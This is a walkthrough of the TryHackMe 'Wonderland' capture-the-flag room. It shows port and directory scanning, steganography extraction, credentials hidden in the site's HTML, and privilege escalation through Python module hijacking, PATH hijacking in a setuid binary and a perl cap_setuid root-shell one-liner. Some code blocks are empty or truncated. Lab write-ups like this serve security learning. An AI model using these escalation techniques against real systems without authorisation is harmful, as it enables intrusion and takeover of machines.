Skip to content


These notes are from a challenge I did @tryhackme called wonderland.

First Checks

Let's scan for open ports first: nmap -sC -sV

Nmap output

``` txt Nmap scan report for Host is up (0.075s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA) | 256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA) |_ 256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519) 80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API) |_http-title: Follow the white rabbit. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at . Nmap done: 1 IP address (1 host up) scanned in 19.20 seconds ```

Let's search for paths on the webpage on port 80: gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u

Gobuster output

txt Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2021/10/21 16:46:38 Starting gobuster in directory enumeration mode =============================================================== /img (Status: 301) [Size: 0] [--> img/] /r (Status: 301) [Size: 0] [--> r/] /poem (Status: 301) [Size: 0] [--> poem/]


Looking at we see the following files:

  • alice_door.jpg
  • alice_door.png
  • white_rabbit_1.jpg

Let's download them all:


and run steghide...

Unfortunately alice_door.jpg and alice_door.png don't show any result (at least not without a passphrase...) but white_rabbit_1.jpg seems promissing:

steghide extract -sf white_rabbit_1.jpg -p ''

the file "hint.txt" does already exist. overwrite ? (y/n) y
wrote extracted data to "hint.txt".
cat hint.txt
follow the r a b b i t

The hint means to follow this path:

Viewing the HTML code we see:

<p style="display: none;">alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>

Login as alice

Let's try to login using those credentials: ssh alice@

ssh login

``` txt Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64)

  • Documentation:
  • Management:
  • Support:

System information as of Thu Oct 21 19:14:20 UTC 2021

System load: 0.0 Processes: 85 Usage of /: 18.9% of 19.56GB Users logged in: 0 Memory usage: 31% IP address for eth0: Swap usage: 0%

0 packages can be updated. 0 updates are security updates.

Last login: Mon May 25 16:37:21 2020 from ```

It is strange to see root.txt in the folder of alice.find ./ -type f -iname "user.txt" doesn't reveal anything. The hint "Everything is upside down here." means if root.txt is here, maybe user.txt is under /root. We can directly read user.txt by runningcat /root/user.txt. lol...

Escalate privileges to rabbit

We see imports and calls random to get 10 random lines from the alice in wonderland lyrics stored in the file:

import random
for i in range(10):
    line = random.choice(poem.split("\n"))
    print("The line was:\t", line)a

Running sudo -l shows we can run as rabbit:

ssh login

``` txt Matching Defaults entries for alice on wonderland: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alice may run the following commands on wonderland: (rabbit) /usr/bin/python3.6 /home/alice/ ```

To escalate privileges we can misuse the fact that we can run by creating our own with the following content to overwrite the random function imported and called in

import os

def choice(argument):

Running with our will now give us prompt as rabbit:

sudo -u rabbit /usr/bin/python3.6 /home/alice/

Tea Party

As rabbit we see the following files in home:

drwxr-x--- 2 rabbit rabbit  4096 May 25  2020 .
drwxr-xr-x 6 root   root    4096 May 25  2020 ..
lrwxrwxrwx 1 root   root       9 May 25  2020 .bash_history -> /dev/null
-rw-r--r-- 1 rabbit rabbit   220 May 25  2020 .bash_logout
-rw-r--r-- 1 rabbit rabbit  3771 May 25  2020 .bashrc
-rw-r--r-- 1 rabbit rabbit   807 May 25  2020 .profile
-rwsr-sr-x 1 root   root   16816 May 25  2020 teaParty

Running teaParty we get the following:

rabbit@wonderland:/home/rabbit$ ./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by Thu, 21 Oct 2021 20:39:50 +0000
Ask very nicely, and I will give you some tea while you wait for him

Let's copy teaParty to the kali machine and view it in detail with strings teaParty:

strings teaParty

Serving teaParty to my kali machine

txt python3 -m http.server Serving HTTP on port 8000 ( ... - - [21/Oct/2021 19:59:25] "GET /teaParty HTTP/1.1" 200 -

Downloading teaParty file

``` txt wget --2021-10-21 15:59:24-- Connecting to connected. HTTP request sent, awaiting response... 200 OK Length: 16816 (16K) [application/octet-stream] Saving to: ‘teaParty’

teaParty 100%[========================================>] 16.42K --.-KB/s in 0.02s

2021-10-21 15:59:24 (895 KB/s) - ‘teaParty’ saved [16816/16816] ```

Runstrings teaParty

txt /lib64/ 2U~4 setuid puts getchar system __cxa_finalize setgid __libc_start_main GLIBC_2.2.5 _ITM_deregisterTMCloneTable __gmon_start__ _ITM_registerTMCloneTable u/UH []A\A]A^A_ Welcome to the tea party! The Mad Hatter will be here soon. /bin/echo -n 'Probably by ' && date --date='next hour' -R Ask very nicely, and I will give you some tea while you wait for him Segmentation fault (core dumped) ;*3$" GCC: (Debian 8.3.0-6) 8.3.0 crtstuff.c deregister_tm_clones __do_global_dtors_aux completed.7325 __do_global_dtors_aux_fini_array_entry frame_dummy __frame_dummy_init_array_entry teaParty.c __FRAME_END__ __init_array_end _DYNAMIC __init_array_start __GNU_EH_FRAME_HDR _GLOBAL_OFFSET_TABLE_ __libc_csu_fini _ITM_deregisterTMCloneTable puts@@GLIBC_2.2.5 _edata system@@GLIBC_2.2.5 __libc_start_main@@GLIBC_2.2.5 __data_start getchar@@GLIBC_2.2.5 __gmon_start__ __dso_handle _IO_stdin_used __libc_csu_init __bss_start main setgid@@GLIBC_2.2.5 __TMC_END__ _ITM_registerTMCloneTable setuid@@GLIBC_2.2.5 __cxa_finalize@@GLIBC_2.2.5 .symtab .strtab .shstrtab .interp .note.ABI-tag .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .text .fini .rodata .eh_frame_hdr .eh_frame .init_array .fini_array .dynamic .got.plt .data .bss .comment

We see the program calls date in this line: /bin/echo -n 'Probably by ' && date --date='next hour' -R. Just like with "random" from above, let's create our own date file e.g.:


Now, let's change the file to be executable by everyone: chmod +x date and add it to the path variables: PATH=/home/rabbit:$PATH

If we now execute ./teaParty we get a shell as hatter:

Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$

We can see the hatter password in /home/hatter/password.txt

Login as hatter

Since we have the user name and password, let' us login with ssh: ssh hatter@

sudo -l, find / -perm -u=s -type f 2>/dev/null and find / -xdev -user hatter 2>/dev/null don't reveal any interesting output but find / -xdev -group hatter 2>/dev/null shows group hatter owns perl. Unfortunately sudo is not possible and the suid bit isn’t set on the perl executable.

There is another thing we can check: With getcap -r / 2>/dev/null we can check for "capabilities" and we see perl in the list:

/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep

Let's run a perl script misusing the capabilities from GTOBins: "If the binary has the Linux CAP_SETUID capability set or it is executed by another binary with the capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID."

/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

We are now root and can read the root.txt in the home folder of alice:

cat /home/alice/root.txt
Back to top